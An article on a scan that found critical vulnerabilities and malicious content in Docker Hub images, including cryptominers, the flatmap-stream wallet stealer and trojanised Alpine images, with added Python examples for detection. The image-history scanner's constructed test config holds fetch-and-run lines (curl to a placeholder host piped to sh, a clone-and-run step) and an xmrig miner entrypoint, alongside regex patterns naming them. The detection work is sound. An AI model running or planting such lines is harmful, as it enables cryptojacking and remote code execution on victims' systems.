An analysis published by Prevasio revealed that more than half of the 4 million images on Docker Hub contain at least one critical vulnerability.
Published near the end of last year, the investigation found that only about 20 percent of the images contained no vulnerabilities at all.
Given that Docker adoption has grown significantly over the last few years, the vulnerabilities discovered represent critical threats for a growing number of companies. Gartner indicates that by 2022 more than 75% of organizations will be running containerized applications in production; at the end of 2020, fewer than 30% could say the same.
The analysis, code-named "Red Kangaroo," took about a month to complete, with more than 800 machines working in parallel. The result is a complete scan of the 4 million images stored on Docker Hub.
In the next few sections we will look at the different kinds of vulnerabilities and malicious content found in Docker images, so that we can better protect our organizations.
With the rising value of cryptocurrency came a rising temptation to mine it on someone else's hardware. At the beginning of 2016, one bitcoin was worth about $435. Last week, Bitcoin reached a peak of more than $63,346, an increase of approximately 14,462.3%. According to operation Red Kangaroo, 44% of the images flagged as malicious or potentially harmful were cryptominers, the largest single category of such content.
When a computer mines cryptocurrency it is searching for a solution to a deliberately hard puzzle (a proof of work) while also validating pending transactions, and together that takes a lot of processing power. Many machines compete to find a solution first, and the first one to succeed is rewarded with newly issued coins. Because every attempt is an independent guess, the process works a little like a lottery: the more guesses per second a machine can make, the better its odds. These days the machines doing this work are not personal laptops but dedicated, very powerful hardware, so the most powerful machines have the best chance of winning.
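The mining lottery described above, as an added example that is not part of the article: a toy proof-of-work search in Python. The header bytes and the difficulty are constructed placeholders; real Bitcoin mining applies the same double SHA-256 to an 80-byte block header, but at a difficulty many orders of magnitude higher.

```python
import hashlib

# Added example, not code from the article: a toy proof-of-work search.
# HEADER is a constructed placeholder, not real block data.
HEADER = b"constructed block header"


def pow_hash(header: bytes, nonce: int) -> bytes:
    """Double SHA-256 of header || nonce (4-byte little-endian), as Bitcoin does."""
    data = header + nonce.to_bytes(4, "little")
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()


def meets_target(digest: bytes, difficulty_bits: int) -> bool:
    """A digest 'wins' when, read as a 256-bit integer, it is below
    2**(256 - difficulty_bits), i.e. its top difficulty_bits bits are zero."""
    return int.from_bytes(digest, "big") < (1 << (256 - difficulty_bits))


def expected_attempts(difficulty_bits: int) -> int:
    """Each nonce is an independent trial with success probability 2**-difficulty_bits,
    so on average 2**difficulty_bits trials are needed: the lottery."""
    return 1 << difficulty_bits


def mine(header: bytes, difficulty_bits: int, max_nonce: int = 1 << 32):
    """Try nonces in order until one meets the target.
    Returns (nonce, digest, attempts), or None if the nonce space is exhausted."""
    for nonce in range(max_nonce):
        digest = pow_hash(header, nonce)
        if meets_target(digest, difficulty_bits):
            return nonce, digest, nonce + 1
    return None


if __name__ == "__main__":
    bits = 16  # small enough to finish in well under a second
    nonce, digest, attempts = mine(HEADER, bits)
    print(f"difficulty {bits} bits: nonce={nonce} after {attempts} attempts "
          f"(expected about {expected_attempts(bits)}), hash={digest.hex()}")
```

Doubling the hash rate halves the expected time to the first hit, which is exactly why cryptojackers want the loop running on other people's CPUs: the cost of all those failed attempts is what they are avoiding.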
Although there is no shortage of Docker images used to mine cryptocurrency, Palo Alto Networks documented one case in particular, from October 2019. The Docker Hub account "azurenql" had eight published images, each containing a variant of a script named "dao.py." The script installed additional software, including Tor, and finished by starting a cryptomining process. The attackers wanted the payout from the mining lottery without paying for the compute and storage it takes to play, and in this case the campaign earned them around $36,000.
Although cryptomining is common, in some cases it is only a distraction. Microsoft has warned of attacks that use cryptocurrency mining to cover their true purpose (while making a little money on the side). Some attackers' real objective is to harvest passwords or other sensitive information from a network, and to get there they hide their scripts inside cryptomining software.
This kind of attack is more advanced and is typically attributed to nation-state actors. The idea is that if antivirus software does raise an alert, it will be an alert about cryptomining. An engineer who sees that kind of alert is likely to treat it with less urgency than an alert about a script stealing user credentials from the network, which is exactly what the attacker is counting on.
The vulnerabilities found in Docker images don't stop at the images themselves. An image can also pull in packages at build time, for example Node.js packages from npm.
According to the Prevasio researchers, the second largest category of "malicious or potentially harmful content" was in fact a single package: flatmap-stream. This package in particular had reached 95 million pulls, and its purpose was to look for bitcoin wallets in order to steal the private keys of the accounts. It is worth noting that a single pull could infect an entire organization, so pull counts are a poor measure of impact. With more than 1,482 Docker images containing this package, according to operation Red Kangaroo, it earned its own category and was the second largest in terms of images with malicious or potentially harmful content.
The original owner of the repository, a user named "dominictarr," had posted a comment saying that he no longer wanted to maintain "event-stream," and that another user, "@right9ctrl," had messaged him asking to take over maintenance of the module. Once "@right9ctrl" had access to the repository, they added commits that pulled in their own dependency, "flatmap-stream," which contained the wallet-stealing code mentioned above.
This example makes an important point: Docker security doesn't depend only on the images themselves, but also on every dependency those images pull in.
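As an added example (not from the article or from the event-stream project) of what checking those dependencies looks like, the Python below walks a package-lock.json (lockfileVersion 1) and lists every dependency chain that leads to a given package version, so a hit on flatmap-stream can be traced back to the top-level package that dragged it in. The lock file is constructed; the only real identifiers in it are event-stream 3.3.6 and flatmap-stream 0.1.1, the versions involved in the incident. "constructed-cli" is a made-up package name.

```python
from collections import defaultdict

# Added example, not from the article: trace which packages in a
# package-lock.json (lockfileVersion 1) pull in a given name@version.
# Constructed lock file; constructed-cli is a made-up package.
LOCK = {
    "name": "constructed-app",
    "lockfileVersion": 1,
    "dependencies": {
        "constructed-cli": {
            "version": "1.0.0",
            "requires": {"event-stream": "^3.3.4", "through": "2.2.0"},
            # nested copy, as npm writes one when versions conflict
            "dependencies": {"through": {"version": "2.2.0"}},
        },
        "event-stream": {
            "version": "3.3.6",
            "requires": {"flatmap-stream": "0.1.1", "through": "~2.3.1"},
        },
        "flatmap-stream": {"version": "0.1.1"},
        "through": {"version": "2.3.8"},
    },
}


def iter_entries(lock: dict):
    """Yield (name, version, resolved) for every locked package, where
    resolved maps each required dependency to the version Node would load
    for it (nearest enclosing 'dependencies' block first, top level last)."""
    top = lock.get("dependencies", {})

    def walk(deps: dict, scopes: list):
        for name, entry in deps.items():
            nested = entry.get("dependencies", {})
            lookup = [nested] + scopes
            resolved = {}
            for dep in entry.get("requires", {}):
                for scope in lookup:
                    if dep in scope:
                        resolved[dep] = scope[dep].get("version", "")
                        break
            yield name, entry.get("version", ""), resolved
            yield from walk(nested, lookup)

    yield from walk(top, [top])


def reverse_graph(lock: dict) -> dict:
    """Map 'name@version' -> sorted list of 'parent@version' entries that require it."""
    parents = defaultdict(set)
    for name, version, resolved in iter_entries(lock):
        parents.setdefault(f"{name}@{version}", set())
        for dep, dep_version in resolved.items():
            parents[f"{dep}@{dep_version}"].add(f"{name}@{version}")
    return {node: sorted(ups) for node, ups in parents.items()}


def find_dependency_paths(lock: dict, package: str, version: str) -> list:
    """Every chain top-level-package -> ... -> package@version in the lock;
    empty if that exact version is not locked."""
    parents = reverse_graph(lock)
    target = f"{package}@{version}"
    if target not in parents:
        return []
    paths = []

    def climb(node: str, chain: list):
        ups = [p for p in parents.get(node, []) if p not in chain]  # cycle guard
        if not ups:
            paths.append(list(reversed(chain)))
            return
        for up in ups:
            climb(up, chain + [up])

    climb(target, [target])
    return paths


if __name__ == "__main__":
    for chain in find_dependency_paths(LOCK, "flatmap-stream", "0.1.1"):
        print(" -> ".join(chain))
```

Running it on the constructed lock reports constructed-cli@1.0.0 -> event-stream@3.3.6 -> flatmap-stream@0.1.1, which is the information you need to decide what to pin or remove; `npm audit` gives the same kind of answer today, but only for packages that have already made it into the advisory database.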
Not all that glitters is gold
Other researchers have also flagged the threat posed by unofficial repositories. A developer might think they are downloading a copy of Jenkins, Apache Tomcat or a version of Alpine Linux. The image may even serve the developer's purpose, in that it contains the software to run a web server or to automate tests, but there is also a possibility that it is doing additional, problematic things, like mining cryptocurrency.
Trend Micro warned last year that a user had published two images, alpine and alpine2, on Docker Hub. A deeper analysis showed that although the images were based on Alpine Linux, they also included instructions to download and run cryptomining code from a specific GitHub repository. In other words, the fact that a container works doesn't mean it isn't doing something malicious under the hood.
Finally, the Prevasio researchers also encountered other ways applications hide malicious content. For example, they found an application that displayed a grid of coloured squares, with a note to developers saying not to block this part of the application. Meanwhile, the application was, you guessed it, mining cryptocurrency.
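Both the azurenql images (install Tor, start a miner) and the alpine/alpine2 images (clone and run code from GitHub) leave their intent in the image's build history. As an added example that is not part of the article or of any vendor's tooling, the Python below scans the "history" array of an OCI image config for download-and-execute steps and miner tooling. The sample configs, the repository and the pool host are constructed, and the regexes are heuristics, not signatures for the real images.

```python
import json
import re

# Added example, not from the article: heuristic scan of an image's build
# history (OCI image config "history[].created_by") for steps that fetch
# and execute remote code or reference mining tooling.
SUSPICIOUS_RULES = [
    ("download-and-execute", re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b")),
    ("clone-and-run", re.compile(r"git clone .*(&&|;).*(python|sh|bash|\./)")),
    ("miner-binary", re.compile(r"\b(xmrig|minerd|cpuminer|cgminer|ethminer)\b", re.I)),
    ("stratum-pool", re.compile(r"stratum\+(tcp|ssl)://", re.I)),
    ("miner-cli-flags", re.compile(r"--donate-level|-o\s+stratum", re.I)),
    ("anonymiser-install",
     re.compile(r"\b(apk add|apt-get install|yum install)\b.*\b(tor|proxychains(4|-ng)?)\b")),
]


def scan_history(config: dict) -> list:
    """Return one finding per (layer, rule) match over config['history']."""
    findings = []
    for idx, entry in enumerate(config.get("history", [])):
        instr = entry.get("created_by", "")
        for rule, pattern in SUSPICIOUS_RULES:
            if pattern.search(instr):
                findings.append({"layer": idx, "rule": rule, "instruction": instr})
    return findings


def scan_config_json(text: str) -> list:
    """Same as scan_history, starting from the raw JSON of an image config."""
    return scan_history(json.loads(text))


# Constructed sample configs; not the real azurenql or alpine2 images.
CLEAN_ALPINE = {"history": [
    {"created_by": "/bin/sh -c #(nop) ADD file:constructed in /"},
    {"created_by": "/bin/sh -c #(nop)  CMD [\"/bin/sh\"]"},
]}

TROJANISED_ALPINE = {"history": [
    {"created_by": "/bin/sh -c #(nop) ADD file:constructed in /"},
    {"created_by": "/bin/sh -c apk add --no-cache git python3 tor"},
    {"created_by": "/bin/sh -c git clone https://github.com/example/constructed-repo.git /opt/m "
                   "&& python3 /opt/m/start.py"},
    {"created_by": "/bin/sh -c curl -sSL https://example.invalid/setup.sh | sh"},
    {"created_by": "/bin/sh -c #(nop)  ENTRYPOINT [\"/opt/m/xmrig\", \"-o\", "
                   "\"stratum+tcp://pool.example.invalid:3333\", \"--donate-level=0\"]"},
]}


if __name__ == "__main__":
    for name, cfg in (("clean", CLEAN_ALPINE), ("trojanised", TROJANISED_ALPINE)):
        print(f"{name}: {len(scan_history(cfg))} finding(s)")
        for hit in scan_history(cfg):
            print(f"  layer {hit['layer']} [{hit['rule']}]: {hit['instruction']}")
```

On a real image the same strings come from `docker history --no-trunc --format '{{.CreatedBy}}' <image>`, or from the config JSON that `skopeo inspect --config docker://<image>` prints; note that `docker image inspect` does not include the history array. A clean result only means the build steps look clean: the Prevasio "coloured squares" case above hides the miner inside application code that no history scan will see, so this check belongs beside a vulnerability scanner and runtime CPU monitoring, not instead of them.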
The Docker documentation says that containers are secure by default. But we also know two things. First, as mentioned above, more and more companies are starting to use Docker. Second, vulnerabilities come, by their nature, from what we don't know. Linux, for example, was considered a secure operating system, yet a vulnerability recently came to light that let any local user obtain a root shell, affected most Linux distributions, and had existed for about 10 years.
Beyond vulnerabilities intrinsic to Linux, the growing number of runtimes and tooling (e.g. .NET Core, PowerShell) that run on both Windows and Linux means that vulnerabilities and attack techniques known from Windows are starting to appear on Linux systems as well.
All of this suggests there are very likely more vulnerabilities out there than the 51 percent the researchers identified. Information security is a constant and evolving challenge.